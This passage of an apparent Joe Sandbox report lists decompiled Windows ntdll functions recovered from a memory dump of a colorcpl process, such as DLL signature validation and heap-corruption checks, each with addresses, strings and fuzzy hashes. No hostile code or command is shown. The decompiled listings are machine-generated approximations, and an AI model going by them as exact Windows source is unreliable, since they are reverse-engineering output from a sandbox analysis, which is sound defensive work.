					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E06E1C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x6f05780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E06E95510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x6f05780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E06E37D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E06E37D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E06E97016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E06E37D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E06E37D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E06E97016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E06E4A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E06E1B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                                                                0x06e27e4c
                                                                                                0x06e27e50
                                                                                                0x06e27e55
                                                                                                0x06e27e58
                                                                                                0x06e27e5d
                                                                                                0x06e27e71
                                                                                                0x06e27f33
                                                                                                0x06e27e77
                                                                                                0x06e27e77
                                                                                                0x06e27e79
                                                                                                0x06e27e79
                                                                                                0x06e27e7e
                                                                                                0x06e27f45
                                                                                                0x06e79848
                                                                                                0x00000000
                                                                                                0x06e79848
                                                                                                0x06e27f4e
                                                                                                0x06e27f53
                                                                                                0x06e27f5a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e7985a
                                                                                                0x06e79862
                                                                                                0x06e79866
                                                                                                0x00000000
                                                                                                0x06e7986c
                                                                                                0x00000000
                                                                                                0x06e7986c
                                                                                                0x06e27e84
                                                                                                0x06e27e84
                                                                                                0x06e27e8d
                                                                                                0x06e79871
                                                                                                0x06e27eb8
                                                                                                0x06e27ec0
                                                                                                0x06e27ec0
                                                                                                0x06e27e9a
                                                                                                0x06e7987e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e79884
                                                                                                0x06e7988b
                                                                                                0x06e798a7
                                                                                                0x06e798ac
                                                                                                0x06e798b1
                                                                                                0x06e798b6
                                                                                                0x06e798b8
                                                                                                0x06e798b8
                                                                                                0x06e798b9
                                                                                                0x00000000
                                                                                                0x06e798b9
                                                                                                0x06e27ea0
                                                                                                0x06e27ea7
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e27eac
                                                                                                0x06e27eb1
                                                                                                0x06e27ec6
                                                                                                0x06e27ed0
                                                                                                0x06e798cc
                                                                                                0x06e27ed6
                                                                                                0x06e27ed6
                                                                                                0x06e27ed6
                                                                                                0x06e27ede
                                                                                                0x06e27ee3
                                                                                                0x06e798e3
                                                                                                0x06e798f0
                                                                                                0x06e79902
                                                                                                0x06e798f2
                                                                                                0x06e798fb
                                                                                                0x06e798fb
                                                                                                0x06e79907
                                                                                                0x06e7991d
                                                                                                0x06e7991d
                                                                                                0x06e79907
                                                                                                0x06e798e3
                                                                                                0x06e27ef0
                                                                                                0x06e27f14
                                                                                                0x06e27f14
                                                                                                0x06e27f1e
                                                                                                0x06e79946
                                                                                                0x06e27f24
                                                                                                0x06e27f24
                                                                                                0x06e27f24
                                                                                                0x06e27f2c
                                                                                                0x06e7996a
                                                                                                0x06e79975
                                                                                                0x06e79975
                                                                                                0x06e7997e
                                                                                                0x06e79993
                                                                                                0x06e79993
                                                                                                0x06e7997e
                                                                                                0x00000000
                                                                                                0x06e27ef2
                                                                                                0x06e27efc
                                                                                                0x06e27f0a
                                                                                                0x06e27f0e
                                                                                                0x06e79933
                                                                                                0x00000000
                                                                                                0x06e79933
                                                                                                0x00000000
                                                                                                0x06e27f0e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e27eb1

                                                                                                Strings
                                                                                                • Could not validate the crypto signature for DLL %wZ, xrefs: 06E79891
                                                                                                • minkernel\ntdll\ldrmap.c, xrefs: 06E798A2
                                                                                                • LdrpCompleteMapModule, xrefs: 06E79898
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                • API String ID: 0-1676968949
                                                                                                • Opcode ID: 4248de6e4d137a860977397a47fd909f3937c225d496e0b81b3b3964800d7249
                                                                                                • Instruction ID: 418026e0cfcfba0ecc31e26968e13f4d3ecfe97e33422931902e3ce25830e8ca
                                                                                                • Opcode Fuzzy Hash: 4248de6e4d137a860977397a47fd909f3937c225d496e0b81b3b3964800d7249
                                                                                                • Instruction Fuzzy Hash: E2510531A047569FFFA1CB58C944BAA7BE5BF01318F142559E9629B3E1D730ED00CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06EC23E3 Relevance: 3.9, Strings: 3, Instructions: 166COMMONCrypto
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 64%
                                                                                                			E06EC23E3(signed int __ecx, unsigned int __edx) {
				intOrPtr _v8;
				intOrPtr _t42;
				char _t43;
				signed short _t44;
				signed short _t48;
				signed char _t51;
				signed short _t52;
				intOrPtr _t54;
				signed short _t64;
				signed short _t66;
				intOrPtr _t69;
				signed short _t73;
				signed short _t76;
				signed short _t77;
				signed short _t79;
				void* _t83;
				signed int _t84;
				signed int _t85;
				signed char _t94;
				unsigned int _t99;
				unsigned int _t104;
				signed int _t108;
				void* _t110;
				void* _t111;
				unsigned int _t114;

				_t84 = __ecx;
				_push(__ecx);
				_t114 = __edx;
				_t42 =  *((intOrPtr*)(__edx + 7));
				if(_t42 == 1) {
					L49:
					_t43 = 1;
					L50:
					return _t43;
				}
				if(_t42 != 4) {
					if(_t42 >= 0) {
						if( *(__ecx + 0x4c) == 0) {
							_t44 =  *__edx & 0x0000ffff;
						} else {
							_t73 =  *__edx;
							if(( *(__ecx + 0x4c) & _t73) != 0) {
								_t73 = _t73 ^  *(__ecx + 0x50);
							}
							_t44 = _t73 & 0x0000ffff;
						}
					} else {
						_t104 = __edx >> 0x00000003 ^  *__edx ^  *0x6f0874c ^ __ecx;
						if(_t104 == 0) {
							_t76 =  *((intOrPtr*)(__edx - (_t104 >> 0xd)));
						} else {
							_t76 = 0;
						}
						_t44 =  *((intOrPtr*)(_t76 + 0x14));
					}
					_t94 =  *((intOrPtr*)(_t114 + 7));
					_t108 = _t44 & 0xffff;
					if(_t94 != 5) {
						if((_t94 & 0x00000040) == 0) {
							if((_t94 & 0x0000003f) == 0x3f) {
								if(_t94 >= 0) {
									if( *(_t84 + 0x4c) == 0) {
										_t48 =  *_t114 & 0x0000ffff;
									} else {
										_t66 =  *_t114;
										if(( *(_t84 + 0x4c) & _t66) != 0) {
											_t66 = _t66 ^  *(_t84 + 0x50);
										}
										_t48 = _t66 & 0x0000ffff;
									}
								} else {
									_t99 = _t114 >> 0x00000003 ^  *_t114 ^  *0x6f0874c ^ _t84;
									if(_t99 == 0) {
										_t69 =  *((intOrPtr*)(_t114 - (_t99 >> 0xd)));
									} else {
										_t69 = 0;
									}
									_t48 =  *((intOrPtr*)(_t69 + 0x14));
								}
								_t85 =  *(_t114 + (_t48 & 0xffff) * 8 - 4);
							} else {
								_t85 = _t94 & 0x3f;
							}
						} else {
							_t85 =  *(_t114 + 4 + (_t94 & 0x3f) * 8) & 0x0000ffff;
						}
					} else {
						_t85 =  *(_t84 + 0x54) & 0x0000ffff ^  *(_t114 + 4) & 0x0000ffff;
					}
					_t110 = (_t108 << 3) - _t85;
				} else {
					if( *(__ecx + 0x4c) == 0) {
						_t77 =  *__edx & 0x0000ffff;
					} else {
						_t79 =  *__edx;
						if(( *(__ecx + 0x4c) & _t79) != 0) {
							_t79 = _t79 ^  *(__ecx + 0x50);
						}
						_t77 = _t79 & 0x0000ffff;
					}
					_t110 =  *((intOrPtr*)(_t114 - 8)) - (_t77 & 0x0000ffff);
				}
				_t51 =  *((intOrPtr*)(_t114 + 7));
				if(_t51 != 5) {
					if((_t51 & 0x00000040) == 0) {
						_t52 = 0;
						goto L42;
					}
					_t64 = _t51 & 0x3f;
					goto L38;
				} else {
					_t64 =  *(_t114 + 6) & 0x000000ff;
					L38:
					_t52 = _t64 << 0x00000003 & 0x0000ffff;
					L42:
					_t35 = _t114 + 8; // -16
					_t111 = _t110 + (_t52 & 0x0000ffff);
					_t83 = _t35 + _t111;
					_t54 = E06E6D4F0(_t83, 0x6df6c58, 8);
					_v8 = _t54;
					if(_t54 == 8) {
						goto L49;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E06E1B150();
					} else {
						E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t111);
					_push(_v8 + _t83);
					E06E1B150("Heap block at %p modified at %p past requested size of %Ix\n", _t114);
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x6f06378 = 1;
						asm("int3");
						 *0x6f06378 = 0;
					}
					_t43 = 0;
					goto L50;
				}
			}




























                                                                                                0x06ec23e3
                                                                                                0x06ec23e8
                                                                                                0x06ec23eb
                                                                                                0x06ec23ee
                                                                                                0x06ec23f3
                                                                                                0x06ec259b
                                                                                                0x06ec259b
                                                                                                0x06ec259d
                                                                                                0x06ec25a3
                                                                                                0x06ec25a3
                                                                                                0x06ec23fb
                                                                                                0x06ec2424
                                                                                                0x06ec244f
                                                                                                0x06ec2460
                                                                                                0x06ec2451
                                                                                                0x06ec2451
                                                                                                0x06ec2456
                                                                                                0x06ec2458
                                                                                                0x06ec2458
                                                                                                0x06ec245b
                                                                                                0x06ec245b
                                                                                                0x06ec2426
                                                                                                0x06ec2431
                                                                                                0x06ec2436
                                                                                                0x06ec2443
                                                                                                0x06ec2438
                                                                                                0x06ec2438
                                                                                                0x06ec2438
                                                                                                0x06ec2445
                                                                                                0x06ec2445
                                                                                                0x06ec2463
                                                                                                0x06ec2469
                                                                                                0x06ec246f
                                                                                                0x06ec2480
                                                                                                0x06ec2495
                                                                                                0x06ec24a1
                                                                                                0x06ec24ce
                                                                                                0x06ec24df
                                                                                                0x06ec24d0
                                                                                                0x06ec24d0
                                                                                                0x06ec24d5
                                                                                                0x06ec24d7
                                                                                                0x06ec24d7
                                                                                                0x06ec24da
                                                                                                0x06ec24da
                                                                                                0x06ec24a3
                                                                                                0x06ec24b0
                                                                                                0x06ec24b5
                                                                                                0x06ec24c2
                                                                                                0x06ec24b7
                                                                                                0x06ec24b7
                                                                                                0x06ec24b7
                                                                                                0x06ec24c4
                                                                                                0x06ec24c4
                                                                                                0x06ec24e8
                                                                                                0x06ec2497
                                                                                                0x06ec249a
                                                                                                0x06ec249a
                                                                                                0x06ec2482
                                                                                                0x06ec2488
                                                                                                0x06ec2488
                                                                                                0x06ec2471
                                                                                                0x06ec2479
                                                                                                0x06ec2479
                                                                                                0x06ec24ef
                                                                                                0x06ec23fd
                                                                                                0x06ec2401
                                                                                                0x06ec2412
                                                                                                0x06ec2403
                                                                                                0x06ec2403
                                                                                                0x06ec2408
                                                                                                0x06ec240a
                                                                                                0x06ec240a
                                                                                                0x06ec240d
                                                                                                0x06ec240d
                                                                                                0x06ec241b
                                                                                                0x06ec241b
                                                                                                0x06ec24f1
                                                                                                0x06ec24f6
                                                                                                0x06ec2507
                                                                                                0x06ec2510
                                                                                                0x00000000
                                                                                                0x06ec2510
                                                                                                0x06ec250b
                                                                                                0x00000000
                                                                                                0x06ec24f8
                                                                                                0x06ec24f8
                                                                                                0x06ec24fc
                                                                                                0x06ec2500
                                                                                                0x06ec2512
                                                                                                0x06ec2515
                                                                                                0x06ec251a
                                                                                                0x06ec2521
                                                                                                0x06ec2524
                                                                                                0x06ec2529
                                                                                                0x06ec252f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ec253c
                                                                                                0x06ec255c
                                                                                                0x06ec2561
                                                                                                0x06ec253e
                                                                                                0x06ec2554
                                                                                                0x06ec2559
                                                                                                0x06ec256a
                                                                                                0x06ec256d
                                                                                                0x06ec2574
                                                                                                0x06ec2586
                                                                                                0x06ec2588
                                                                                                0x06ec258f
                                                                                                0x06ec2590
                                                                                                0x06ec2590
                                                                                                0x06ec2597
                                                                                                0x00000000
                                                                                                0x06ec2597

                                                                                                Strings
                                                                                                • HEAP: , xrefs: 06EC255C
                                                                                                • Heap block at %p modified at %p past requested size of %Ix, xrefs: 06EC256F
                                                                                                • HEAP[%wZ]: , xrefs: 06EC254F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                • API String ID: 0-3815128232
                                                                                                • Opcode ID: ec93b452e3111e36f190a150b79fdd432b9a96882a90326fa3928fb57c2a796c
                                                                                                • Instruction ID: e94ad8f2d6b834ad048ce35a5e3960bbdbdabd0b2c19073bae9ee7adb4717df1
                                                                                                • Opcode Fuzzy Hash: ec93b452e3111e36f190a150b79fdd432b9a96882a90326fa3928fb57c2a796c
                                                                                                • Instruction Fuzzy Hash: 285158346103508FE3F4CF29CA447B273E2FB48668F05585DEAD28B285D235DA47DB61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E1E620 Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 93%
                                                                                                			E06E1E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E06E1F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E06E595D0();
						}
						if(_t78 != 0) {
							L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E06E5FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E06E5BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E06E59600();
					if(_t97 < 0) {
						goto L6;
					}
					E06E5BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L06E1F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E06E5BB40(_t83, _t102 + 0x24, _t78);
								if(L06E243C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E06E5BB40(_t84, _t102 + 0x24, _t94);
									if(L06E243C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                                                                0x06e1e620
                                                                                                0x06e1e628
                                                                                                0x06e1e62f
                                                                                                0x06e1e631
                                                                                                0x06e1e635
                                                                                                0x06e1e637
                                                                                                0x06e1e63e
                                                                                                0x06e75503
                                                                                                0x06e75503
                                                                                                0x06e1e64c
                                                                                                0x06e1e64c
                                                                                                0x06e1e651
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e1e661
                                                                                                0x06e1e665
                                                                                                0x06e7542a
                                                                                                0x06e1e715
                                                                                                0x06e1e71a
                                                                                                0x06e1e71c
                                                                                                0x06e1e720
                                                                                                0x06e1e720
                                                                                                0x06e1e727
                                                                                                0x06e1e736
                                                                                                0x06e1e736
                                                                                                0x06e1e743
                                                                                                0x06e1e743
                                                                                                0x06e1e673
                                                                                                0x06e1e678
                                                                                                0x06e1e67d
                                                                                                0x06e1e682
                                                                                                0x06e1e685
                                                                                                0x06e1e692
                                                                                                0x06e1e69b
                                                                                                0x06e1e6a3
                                                                                                0x06e1e6ad
                                                                                                0x06e1e6b1
                                                                                                0x06e1e6b2
                                                                                                0x06e1e6bb
                                                                                                0x06e1e6bf
                                                                                                0x06e1e6c0
                                                                                                0x06e1e6c8
                                                                                                0x06e1e6cc
                                                                                                0x06e1e6d5
                                                                                                0x06e1e6d9
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e1e6e5
                                                                                                0x06e1e6ea
                                                                                                0x06e1e6f9
                                                                                                0x06e1e70b
                                                                                                0x06e1e70f
                                                                                                0x06e75439
                                                                                                0x06e7545e
                                                                                                0x06e7545e
                                                                                                0x00000000
                                                                                                0x06e7545e
                                                                                                0x06e7543b
                                                                                                0x06e7543e
                                                                                                0x06e75440
                                                                                                0x06e75445
                                                                                                0x06e75472
                                                                                                0x06e75475
                                                                                                0x06e7548d
                                                                                                0x06e75493
                                                                                                0x06e754a9
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e754ab
                                                                                                0x06e754b4
                                                                                                0x06e754bc
                                                                                                0x06e754c8
                                                                                                0x06e754de
                                                                                                0x06e754fb
                                                                                                0x06e754e0
                                                                                                0x06e754e6
                                                                                                0x06e754eb
                                                                                                0x06e754eb
                                                                                                0x06e754de
                                                                                                0x00000000
                                                                                                0x06e754bc
                                                                                                0x06e75477
                                                                                                0x06e7547a
                                                                                                0x06e75480
                                                                                                0x06e75483
                                                                                                0x06e75486
                                                                                                0x06e7548b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e7548b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e75447
                                                                                                0x06e75447
                                                                                                0x06e75447
                                                                                                0x06e75447
                                                                                                0x06e7544e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e75450
                                                                                                0x06e75452
                                                                                                0x06e75455
                                                                                                0x06e7545a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e7545c
                                                                                                0x06e7546a
                                                                                                0x06e7546d
                                                                                                0x06e7546f
                                                                                                0x00000000
                                                                                                0x06e7546f
                                                                                                0x06e1e70f

                                                                                                Strings
                                                                                                • @, xrefs: 06E1E6C0
                                                                                                • InstallLanguageFallback, xrefs: 06E1E6DB
                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 06E1E68C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                                • API String ID: 0-1757540487
                                                                                                • Opcode ID: 55244c448b9d51ff23a1b708c727e1337dd74deefd8b11d8fe583f4b2cb4fbea
                                                                                                • Instruction ID: ad0f5d85f40ec17a7eecbae6b82166802cd93e619563962cc106de6b2def49e8
                                                                                                • Opcode Fuzzy Hash: 55244c448b9d51ff23a1b708c727e1337dd74deefd8b11d8fe583f4b2cb4fbea
                                                                                                • Instruction Fuzzy Hash: C051C4729083459BD794DF24C840AABB3E8BF88618F05192EF995DB240FB34D905D7A2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E3B8E4 Relevance: 3.8, Strings: 3, Instructions: 69COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 60%
                                                                                                			E06E3B8E4(unsigned int __edx) {
				void* __ecx;
				void* __edi;
				intOrPtr* _t16;
				intOrPtr _t18;
				void* _t27;
				void* _t28;
				unsigned int _t30;
				intOrPtr* _t31;
				unsigned int _t38;
				void* _t39;
				unsigned int _t40;

				_t40 = __edx;
				_t39 = _t28;
				if( *0x6f08748 >= 1) {
					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
						_t18 =  *[fs:0x30];
						__eflags =  *(_t18 + 0xc);
						if( *(_t18 + 0xc) == 0) {
							_push("HEAP: ");
							E06E1B150();
						} else {
							E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
						E06E1B150();
						__eflags =  *0x6f07bc8;
						if(__eflags == 0) {
							E06ED2073(_t27, 1, _t39, __eflags);
						}
					}
				}
				_t38 =  *(_t39 + 0xb8);
				if(_t38 != 0) {
					_t13 = _t40 >> 0xc;
					__eflags = _t13;
					while(1) {
						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
							break;
						}
						_t30 =  *_t38;
						__eflags = _t30;
						if(_t30 != 0) {
							_t38 = _t30;
							continue;
						}
						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
						break;
					}
					return E06E3AB40(_t39, _t38, 0, _t13, _t40);
				} else {
					_t31 = _t39 + 0x8c;
					_t16 =  *_t31;
					while(_t31 != _t16) {
						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
							return _t16;
						}
						_t16 =  *_t16;
					}
					return _t31;
				}
			}














                                                                                                0x06e3b8f0
                                                                                                0x06e3b8f2
                                                                                                0x06e3b8f4
                                                                                                0x06e82c4e
                                                                                                0x06e82c50
                                                                                                0x06e82c56
                                                                                                0x06e82c5c
                                                                                                0x06e82c60
                                                                                                0x06e82c7f
                                                                                                0x06e82c84
                                                                                                0x06e82c62
                                                                                                0x06e82c77
                                                                                                0x06e82c7c
                                                                                                0x06e82c8a
                                                                                                0x06e82c8f
                                                                                                0x06e82c94
                                                                                                0x06e82c9c
                                                                                                0x06e82ca5
                                                                                                0x06e82ca5
                                                                                                0x06e82c9c
                                                                                                0x06e82c50
                                                                                                0x06e3b8fa
                                                                                                0x06e3b902
                                                                                                0x06e3b921
                                                                                                0x06e3b921
                                                                                                0x06e3b924
                                                                                                0x06e3b924
                                                                                                0x06e3b927
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e3b929
                                                                                                0x06e3b92b
                                                                                                0x06e3b92d
                                                                                                0x06e3b940
                                                                                                0x00000000
                                                                                                0x06e3b940
                                                                                                0x06e3b932
                                                                                                0x06e3b932
                                                                                                0x00000000
                                                                                                0x06e3b932
                                                                                                0x00000000
                                                                                                0x06e3b904
                                                                                                0x06e3b904
                                                                                                0x06e3b90a
                                                                                                0x06e3b90c
                                                                                                0x06e3b916
                                                                                                0x06e3b919
                                                                                                0x06e3b915
                                                                                                0x06e3b915
                                                                                                0x06e3b91b
                                                                                                0x06e3b91b
                                                                                                0x00000000
                                                                                                0x06e3b910

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                • API String ID: 0-2558761708
                                                                                                • Opcode ID: f58ff22cc2467a122d2ad201931712100817d1322f771eb43aaf18958f880e74
                                                                                                • Instruction ID: 471c754df7227872818040c22578ce0a74cbf40937fb89a8233ed840c50a3512
                                                                                                • Opcode Fuzzy Hash: f58ff22cc2467a122d2ad201931712100817d1322f771eb43aaf18958f880e74
                                                                                                • Instruction Fuzzy Hash: 6B112631B143219FEBE8DB14C888F76B3A9EF60A24F15A029E11BCF240D730D984C681
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E4FAB0 Relevance: 2.8, Strings: 2, Instructions: 306COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 80%
                                                                                                			E06E4FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
